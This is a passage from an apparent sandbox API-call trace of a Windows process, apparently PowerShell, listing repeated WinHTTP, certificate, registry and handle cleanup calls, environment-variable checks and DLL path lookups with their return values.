	[0316.292] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0316.292] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2960 | out: pvContextBuffer=0x2ad3bad2960) returned 0x0
	[0324.440] WinHttpCloseHandle (hInternet=0x2ad3bb1a780) returned 1
	[0324.440] CertFreeCertificateContext (pCertContext=0x2ad3bb04950) returned 1
	[0324.441] CloseHandle (hObject=0x9cc) returned 1
	[0324.441] CloseHandle (hObject=0x3f4) returned 1
	[0324.441] RegCloseKey (hKey=0x398) returned 0x0
	[0324.441] CloseHandle (hObject=0x270) returned 1
	[0324.441] RegCloseKey (hKey=0x25c) returned 0x0
	[0324.441] CloseHandle (hObject=0xe4) returned 1
	[0324.441] RegCloseKey (hKey=0x9d0) returned 0x0
	[0324.441] RegCloseKey (hKey=0x388) returned 0x0
	[0324.442] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0324.443] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0324.443] CertFreeCertificateContext (pCertContext=0x2ad3bb04950) returned 1
	[0324.443] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0324.443] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2b40 | out: pvContextBuffer=0x2ad3bad2b40) returned 0x0
	[0341.468] WinHttpCloseHandle (hInternet=0x2ad3bb1abc0) returned 1
	[0341.469] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0341.469] CloseHandle (hObject=0x9cc) returned 1
	[0341.469] CloseHandle (hObject=0x3f4) returned 1
	[0341.469] RegCloseKey (hKey=0x398) returned 0x0
	[0341.469] CloseHandle (hObject=0x270) returned 1
	[0341.469] RegCloseKey (hKey=0x25c) returned 0x0
	[0341.470] CloseHandle (hObject=0xe4) returned 1
	[0341.470] RegCloseKey (hKey=0x9d0) returned 0x0
	[0341.470] RegCloseKey (hKey=0x388) returned 0x0
	[0341.471] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0341.471] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0341.471] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0341.471] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0341.472] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3080 | out: pvContextBuffer=0x2ad3bad3080) returned 0x0
	[0359.452] WinHttpCloseHandle (hInternet=0x2ad3bb18140) returned 1
	[0359.452] CertFreeCertificateContext (pCertContext=0x2ad3bb05ad0) returned 1
	[0359.452] CloseHandle (hObject=0x9cc) returned 1
	[0359.453] CloseHandle (hObject=0x3f4) returned 1
	[0359.453] RegCloseKey (hKey=0x398) returned 0x0
	[0359.453] CloseHandle (hObject=0x270) returned 1
	[0359.453] RegCloseKey (hKey=0x25c) returned 0x0
	[0359.453] CloseHandle (hObject=0xe4) returned 1
	[0359.453] RegCloseKey (hKey=0x9d0) returned 0x0
	[0359.453] RegCloseKey (hKey=0x388) returned 0x0
	[0359.454] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0359.454] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0359.454] CertFreeCertificateContext (pCertContext=0x2ad3bb05ad0) returned 1
	[0359.454] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0359.454] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3b00 | out: pvContextBuffer=0x2ad3bad3b00) returned 0x0
	[0376.486] CertFreeCertificateContext (pCertContext=0x2ad3bb05bd0) returned 1
	[0376.486] WinHttpCloseHandle (hInternet=0x2ad3bb19240) returned 1
	[0376.487] CloseHandle (hObject=0x9cc) returned 1
	[0376.487] CloseHandle (hObject=0x3f4) returned 1
	[0376.487] RegCloseKey (hKey=0x398) returned 0x0
	[0376.488] CloseHandle (hObject=0x270) returned 1
	[0376.488] RegCloseKey (hKey=0x25c) returned 0x0
	[0376.488] CloseHandle (hObject=0xe4) returned 1
	[0376.488] RegCloseKey (hKey=0x9d0) returned 0x0
	[0376.488] RegCloseKey (hKey=0x388) returned 0x0
	[0376.489] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0376.489] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0376.489] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0376.489] CertFreeCertificateContext (pCertContext=0x2ad3bb05bd0) returned 1
	[0376.490] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3620 | out: pvContextBuffer=0x2ad3bad3620) returned 0x0
	[0391.747] WinHttpCloseHandle (hInternet=0x2ad3bb17d00) returned 1
	[0391.747] CertFreeCertificateContext (pCertContext=0x2ad3bb05350) returned 1
	[0391.747] CloseHandle (hObject=0x9cc) returned 1
	[0391.748] CloseHandle (hObject=0x3f4) returned 1
	[0391.748] RegCloseKey (hKey=0x398) returned 0x0
	[0391.748] CloseHandle (hObject=0x270) returned 1
	[0391.748] RegCloseKey (hKey=0x25c) returned 0x0
	[0391.748] CloseHandle (hObject=0xe4) returned 1
	[0391.748] RegCloseKey (hKey=0x9d0) returned 0x0
	[0391.749] RegCloseKey (hKey=0x388) returned 0x0
	[0391.749] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0391.749] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0391.750] CertFreeCertificateContext (pCertContext=0x2ad3bb05350) returned 1
	[0391.750] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0391.750] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2fc0 | out: pvContextBuffer=0x2ad3bad2fc0) returned 0x0
	[0406.619] WinHttpCloseHandle (hInternet=0x2ad3bb187a0) returned 1
	[0406.620] CertFreeCertificateContext (pCertContext=0x2ad3bb06650) returned 1
	[0406.620] CloseHandle (hObject=0x9cc) returned 1
	[0406.620] CloseHandle (hObject=0x3f4) returned 1
	[0406.620] RegCloseKey (hKey=0x398) returned 0x0
	[0406.620] CloseHandle (hObject=0x270) returned 1
	[0406.620] RegCloseKey (hKey=0x25c) returned 0x0
	[0406.620] CloseHandle (hObject=0xe4) returned 1
	[0406.620] RegCloseKey (hKey=0x9d0) returned 0x0
	[0406.620] RegCloseKey (hKey=0x388) returned 0x0
	[0406.621] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0406.621] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0406.621] CertFreeCertificateContext (pCertContext=0x2ad3bb06650) returned 1
	[0406.622] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0406.622] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3920 | out: pvContextBuffer=0x2ad3bad3920) returned 0x0
	[0417.715] WinHttpCloseHandle (hInternet=0x2ad3bb1b000) returned 1
	[0417.715] CertFreeCertificateContext (pCertContext=0x2ad3bb05e50) returned 1
	[0417.715] CloseHandle (hObject=0x3f4) returned 1
	[0417.715] CloseHandle (hObject=0x398) returned 1
	[0417.715] RegCloseKey (hKey=0x270) returned 0x0
	[0417.715] CloseHandle (hObject=0x25c) returned 1
	[0417.715] RegCloseKey (hKey=0xe4) returned 0x0
	[0417.715] CloseHandle (hObject=0x9d0) returned 1
	[0417.716] RegCloseKey (hKey=0x164) returned 0x0
	[0417.716] RegCloseKey (hKey=0x388) returned 0x0
	[0417.716] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0417.716] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0417.717] CertFreeCertificateContext (pCertContext=0x2ad3bb05e50) returned 1
	[0417.717] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0417.717] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad32c0 | out: pvContextBuffer=0x2ad3bad32c0) returned 0x0
	[0436.783] CertFreeCertificateContext (pCertContext=0x2ad3bb05150) returned 1
	[0436.783] WinHttpCloseHandle (hInternet=0x2ad3bb19ac0) returned 1
	[0436.783] CloseHandle (hObject=0x3f4) returned 1
	[0436.783] CloseHandle (hObject=0x398) returned 1
	[0436.783] RegCloseKey (hKey=0x270) returned 0x0
	[0436.784] CloseHandle (hObject=0x25c) returned 1
	[0436.784] RegCloseKey (hKey=0xe4) returned 0x0
	[0436.784] CloseHandle (hObject=0x9d0) returned 1
	[0436.784] RegCloseKey (hKey=0x164) returned 0x0
	[0436.784] RegCloseKey (hKey=0x388) returned 0x0
	[0436.784] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0436.784] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0436.785] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0436.785] CertFreeCertificateContext (pCertContext=0x2ad3bb05150) returned 1
	[0436.785] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3800 | out: pvContextBuffer=0x2ad3bad3800) returned 0x0
	[0457.699] WinHttpCloseHandle (hInternet=0x2ad3bb19ce0) returned 1
	[0457.700] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0457.700] CloseHandle (hObject=0x3f4) returned 1
	[0457.700] CloseHandle (hObject=0x398) returned 1
	[0457.700] RegCloseKey (hKey=0x270) returned 0x0
	[0457.701] CloseHandle (hObject=0x25c) returned 1
	[0457.701] RegCloseKey (hKey=0xe4) returned 0x0
	[0457.701] CloseHandle (hObject=0x9d0) returned 1
	[0457.701] RegCloseKey (hKey=0x164) returned 0x0
	[0457.701] RegCloseKey (hKey=0x388) returned 0x0
	[0457.702] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0457.702] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0457.702] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0457.702] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0457.703] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2960 | out: pvContextBuffer=0x2ad3bad2960) returned 0x0
	[0476.954] WinHttpCloseHandle (hInternet=0x2ad3bb18580) returned 1
	[0476.955] CertFreeCertificateContext (pCertContext=0x2ad3bb04cd0) returned 1
	[0476.955] CloseHandle (hObject=0x3f4) returned 1
	[0476.955] CloseHandle (hObject=0x398) returned 1
	[0476.956] RegCloseKey (hKey=0x270) returned 0x0
	[0476.956] CloseHandle (hObject=0x25c) returned 1
	[0476.956] RegCloseKey (hKey=0xe4) returned 0x0
	[0476.956] CloseHandle (hObject=0x9d0) returned 1
	[0476.957] RegCloseKey (hKey=0x164) returned 0x0
	[0476.957] RegCloseKey (hKey=0x388) returned 0x0
	[0476.957] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0476.958] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0476.958] CertFreeCertificateContext (pCertContext=0x2ad3bb04cd0) returned 1
	[0476.959] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0476.959] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3920 | out: pvContextBuffer=0x2ad3bad3920) returned 0x0
	[0485.193] WinHttpCloseHandle (hInternet=0x2ad3bb19f00) returned 1
	[0485.193] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0485.193] CloseHandle (hObject=0x3f4) returned 1
	[0485.193] CloseHandle (hObject=0x398) returned 1
	[0485.193] RegCloseKey (hKey=0x270) returned 0x0
	[0485.194] CloseHandle (hObject=0x25c) returned 1
	[0485.194] RegCloseKey (hKey=0xe4) returned 0x0
	[0485.194] CloseHandle (hObject=0x9d0) returned 1
	[0485.194] RegCloseKey (hKey=0x164) returned 0x0
	[0485.194] RegCloseKey (hKey=0x388) returned 0x0
	[0485.195] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0485.195] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0485.195] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0485.195] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0485.196] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3500 | out: pvContextBuffer=0x2ad3bad3500) returned 0x0
	[0489.191] RegCloseKey (hKey=0x270) returned 0x0
	[0489.191] CloseHandle (hObject=0x25c) returned 1
	[0489.191] RegCloseKey (hKey=0xe4) returned 0x0
	[0489.191] CloseHandle (hObject=0x9d0) returned 1
	[0489.191] RegCloseKey (hKey=0x164) returned 0x0
	[0489.192] RegCloseKey (hKey=0x388) returned 0x0
	[0489.192] WinHttpCloseHandle (hInternet=0x2ad3bb1b440) returned 1
	[0489.192] CloseHandle (hObject=0x398) returned 1
	[0489.192] CloseHandle (hObject=0x3f4) returned 1
	[0500.232] CertFreeCertificateContext (pCertContext=0x2ad3bb04dd0) returned 1
	[0500.232] WinHttpCloseHandle (hInternet=0x2ad3bb198a0) returned 1
	[0500.232] CloseHandle (hObject=0x25c) returned 1
	[0500.233] CloseHandle (hObject=0xe4) returned 1
	[0500.233] RegCloseKey (hKey=0x9d0) returned 0x0
	[0500.233] CloseHandle (hObject=0x164) returned 1
	[0500.233] RegCloseKey (hKey=0x388) returned 0x0
	[0500.233] CloseHandle (hObject=0x9cc) returned 1
	[0500.233] RegCloseKey (hKey=0x398) returned 0x0
	[0500.233] RegCloseKey (hKey=0x3f4) returned 0x0
	[0500.234] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0500.234] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0500.234] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0500.234] CertFreeCertificateContext (pCertContext=0x2ad3bb04dd0) returned 1
	[0500.235] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2cc0 | out: pvContextBuffer=0x2ad3bad2cc0) returned 0x0
	[0520.487] WinHttpCloseHandle (hInternet=0x2ad3bb1a780) returned 1
	[0520.487] CertFreeCertificateContext (pCertContext=0x2ad3bb049d0) returned 1
	[0520.488] CloseHandle (hObject=0x25c) returned 1
	[0520.488] CloseHandle (hObject=0xe4) returned 1
	[0520.488] RegCloseKey (hKey=0x9d0) returned 0x0
	[0520.488] CloseHandle (hObject=0x164) returned 1
	[0520.488] RegCloseKey (hKey=0x388) returned 0x0
	[0520.489] CloseHandle (hObject=0x9cc) returned 1
	[0520.489] RegCloseKey (hKey=0x398) returned 0x0
	[0520.489] RegCloseKey (hKey=0x3f4) returned 0x0
	[0520.490] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0520.490] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0520.490] CertFreeCertificateContext (pCertContext=0x2ad3bb049d0) returned 1
	[0520.490] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0520.491] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2c60 | out: pvContextBuffer=0x2ad3bad2c60) returned 0x0
	[0534.737] WinHttpCloseHandle (hInternet=0x2ad3bb1a780) returned 1
	[0534.738] CertFreeCertificateContext (pCertContext=0x2ad3bb060d0) returned 1
	[0534.738] CloseHandle (hObject=0xe4) returned 1
	[0534.738] CloseHandle (hObject=0x9d0) returned 1
	[0534.738] RegCloseKey (hKey=0x164) returned 0x0
	[0534.738] CloseHandle (hObject=0x388) returned 1
	[0534.739] RegCloseKey (hKey=0x9cc) returned 0x0
	[0534.739] CloseHandle (hObject=0x398) returned 1
	[0534.739] RegCloseKey (hKey=0x9d8) returned 0x0
	[0534.739] RegCloseKey (hKey=0x3f4) returned 0x0
	[0534.739] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0534.740] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0534.740] CertFreeCertificateContext (pCertContext=0x2ad3bb060d0) returned 1
	[0534.740] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0534.741] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad30e0 | out: pvContextBuffer=0x2ad3bad30e0) returned 0x0
	[0557.077] WinHttpCloseHandle (hInternet=0x2ad3bb19680) returned 1
	[0557.077] CertFreeCertificateContext (pCertContext=0x2ad3bb061d0) returned 1
	[0557.077] CloseHandle (hObject=0xe4) returned 1
	[0557.078] CloseHandle (hObject=0x9d0) returned 1
	[0557.078] RegCloseKey (hKey=0x164) returned 0x0
	[0557.078] CloseHandle (hObject=0x388) returned 1
	[0557.078] RegCloseKey (hKey=0x9cc) returned 0x0
	[0557.078] CloseHandle (hObject=0x398) returned 1
	[0557.078] RegCloseKey (hKey=0x9d8) returned 0x0
	[0557.078] RegCloseKey (hKey=0x3f4) returned 0x0
	[0557.079] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0557.079] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0557.079] CertFreeCertificateContext (pCertContext=0x2ad3bb061d0) returned 1
	[0557.079] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0557.080] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad32c0 | out: pvContextBuffer=0x2ad3bad32c0) returned 0x0
	[0576.968] WinHttpCloseHandle (hInternet=0x2ad3bb18580) returned 1
	[0576.968] CertFreeCertificateContext (pCertContext=0x2ad3bb06250) returned 1
	[0576.968] CloseHandle (hObject=0xe4) returned 1
	[0576.968] CloseHandle (hObject=0x9d0) returned 1
	[0576.968] RegCloseKey (hKey=0x164) returned 0x0
	[0576.968] CloseHandle (hObject=0x388) returned 1
	[0576.968] RegCloseKey (hKey=0x9cc) returned 0x0
	[0576.968] CloseHandle (hObject=0x398) returned 1
	[0576.969] RegCloseKey (hKey=0x9d8) returned 0x0
	[0576.969] RegCloseKey (hKey=0x3f4) returned 0x0
	[0576.969] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0576.969] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0576.970] CertFreeCertificateContext (pCertContext=0x2ad3bb06250) returned 1
	[0576.970] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0576.970] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3380 | out: pvContextBuffer=0x2ad3bad3380) returned 0x0
	[0591.304] WinHttpCloseHandle (hInternet=0x2ad3bb19680) returned 1
	[0591.305] CertFreeCertificateContext (pCertContext=0x2ad3bb057d0) returned 1
	[0591.305] CloseHandle (hObject=0xe4) returned 1
	[0591.305] CloseHandle (hObject=0x9d0) returned 1
	[0591.305] RegCloseKey (hKey=0x164) returned 0x0
	[0591.306] CloseHandle (hObject=0x388) returned 1
	[0591.306] RegCloseKey (hKey=0x9cc) returned 0x0
	[0591.306] CloseHandle (hObject=0x398) returned 1
	[0591.306] RegCloseKey (hKey=0x9d8) returned 0x0
	[0591.306] RegCloseKey (hKey=0x3f4) returned 0x0
	[0591.307] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0591.307] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0591.307] CertFreeCertificateContext (pCertContext=0x2ad3bb057d0) returned 1
	[0591.307] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0591.308] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad30e0 | out: pvContextBuffer=0x2ad3bad30e0) returned 0x0
	[0613.213] WinHttpCloseHandle (hInternet=0x2ad3bb198a0) returned 1
	[0613.213] CertFreeCertificateContext (pCertContext=0x2ad3bb04dd0) returned 1
	[0613.213] CloseHandle (hObject=0xe4) returned 1
	[0613.214] CloseHandle (hObject=0x9d0) returned 1
	[0613.214] RegCloseKey (hKey=0x164) returned 0x0
	[0613.214] CloseHandle (hObject=0x388) returned 1
	[0613.214] RegCloseKey (hKey=0x9cc) returned 0x0
	[0613.214] CloseHandle (hObject=0x398) returned 1
	[0613.214] RegCloseKey (hKey=0x9d8) returned 0x0
	[0613.214] RegCloseKey (hKey=0x3f4) returned 0x0
	[0613.215] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0613.215] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0613.215] CertFreeCertificateContext (pCertContext=0x2ad3bb04dd0) returned 1
	[0613.215] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0613.216] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3b00 | out: pvContextBuffer=0x2ad3bad3b00) returned 0x0
	[0627.215] CertFreeCertificateContext (pCertContext=0x2ad3bb05150) returned 1
	[0627.215] WinHttpCloseHandle (hInternet=0x2ad3bb1abc0) returned 1
	[0627.215] CloseHandle (hObject=0xe4) returned 1
	[0627.215] CloseHandle (hObject=0x9d0) returned 1
	[0627.216] RegCloseKey (hKey=0x164) returned 0x0
	[0627.216] CloseHandle (hObject=0x388) returned 1
	[0627.216] RegCloseKey (hKey=0x9cc) returned 0x0
	[0627.216] CloseHandle (hObject=0x398) returned 1
	[0627.216] RegCloseKey (hKey=0x9d8) returned 0x0
	[0627.216] RegCloseKey (hKey=0x3f4) returned 0x0
	[0627.216] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0627.217] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0627.217] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0627.217] CertFreeCertificateContext (pCertContext=0x2ad3bb05150) returned 1
	[0627.217] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3980 | out: pvContextBuffer=0x2ad3bad3980) returned 0x0

Thread:
	id = 199
	os_tid = 0x480

	[0121.874] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0121.886] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55720
	[0121.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.886] CoTaskMemFree (pv=0x2ad22d55720) 
	[0121.889] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d552e0
	[0121.889] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d552e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.889] CoTaskMemFree (pv=0x2ad22d552e0) 
	[0121.898] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55c70
	[0121.898] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55c70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.898] CoTaskMemFree (pv=0x2ad22d55c70) 
	[0121.899] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54400
	[0121.899] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54400, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.899] CoTaskMemFree (pv=0x2ad22d54400) 
	[0121.900] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55c70
	[0121.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55c70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.900] CoTaskMemFree (pv=0x2ad22d55c70) 
	[0121.905] VirtualQuery (in: lpAddress=0xeed8e060, lpBuffer=0xd7eed8ef20, dwLength=0x30 | out: lpBuffer=0xd7eed8ef20*(BaseAddress=0xeed8e000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fef82000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.905] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55500
	[0121.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55500, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.905] CoTaskMemFree (pv=0x2ad22d55500) 
	[0121.908] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54a60
	[0121.908] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54a60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.908] CoTaskMemFree (pv=0x2ad22d54a60) 
	[0121.909] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55830
	[0121.909] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.909] CoTaskMemFree (pv=0x2ad22d55830) 
	[0121.909] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55940
	[0121.909] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55940, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.909] CoTaskMemFree (pv=0x2ad22d55940) 
	[0121.937] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d553f0
	[0121.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d553f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.937] CoTaskMemFree (pv=0x2ad22d553f0) 
	[0122.016] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55940
	[0122.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55940, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.016] CoTaskMemFree (pv=0x2ad22d55940) 
	[0122.019] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55c70
	[0122.019] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55c70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.019] CoTaskMemFree (pv=0x2ad22d55c70) 
	[0122.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xd7eed8e670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0122.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xd7eed8e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0122.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xd7eed8e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0122.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xd7eed8e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0122.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xd7eed8e650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0122.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xd7eed8e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
